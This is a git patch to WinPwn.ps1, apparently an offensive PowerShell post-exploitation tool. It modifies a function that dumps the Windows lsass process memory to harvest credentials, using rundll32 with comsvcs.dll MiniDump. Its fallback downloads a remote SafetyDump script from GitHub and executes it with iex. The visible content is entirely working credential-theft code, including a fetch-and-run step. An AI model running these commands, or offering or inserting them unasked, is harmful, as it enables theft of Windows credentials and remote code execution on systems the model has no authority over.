From 2f0b811601135a2d86347df643b20f0b47c2de3d Mon Sep 17 00:00:00 2001
From: SecureThisShit <27858067+SecureThisShit@users.noreply.github.com>
Date: Sat, 31 Aug 2019 13:23:47 +0200
Subject: [PATCH] Update WinPwn.ps1

---
 WinPwn.ps1 | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/WinPwn.ps1 b/WinPwn.ps1
index 44593e8..0e6e310 100644
--- a/WinPwn.ps1
+++ b/WinPwn.ps1
@@ -503,13 +503,14 @@ function dumplsass
     	$dumpid = foreach ($process in $processes){if ($process.ProcessName -eq "lsass"){$process.id}}
 	Write-Host "Found lsass process with ID $dumpid - starting dump with rundll32"
 	Write-Host "Dumpfile goes to .\Exploitation\$env:computername.dmp "
-	rundll32 C:\Windows\System32\comsvcs.dll, MiniDump $dumpid $currentPath\$env:computername.dmp full
+	rundll32 C:\Windows\System32\comsvcs.dll, MiniDump $dumpid $currentPath\Exploitation\$env:computername.dmp full
 	}
 	catch{
 		Write-Host "Something went wrong, using safetykatz instead"
                  iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SafetyDump.ps1')
-                 Write-Host -ForegroundColor Yellow 'Dumping lsass to C:\windows\temp\debug.bin :'
+                 Write-Host -ForegroundColor Yellow 'Dumping lsass to .\Exploitation\debug.bin :'
                  Safetydump
+		 move C:\windows\temp\debug.bin $currentPath\Exploitation\debug.bin
 	}
     }
     else{Write-Host "No Admin rights, start again using a privileged session!"}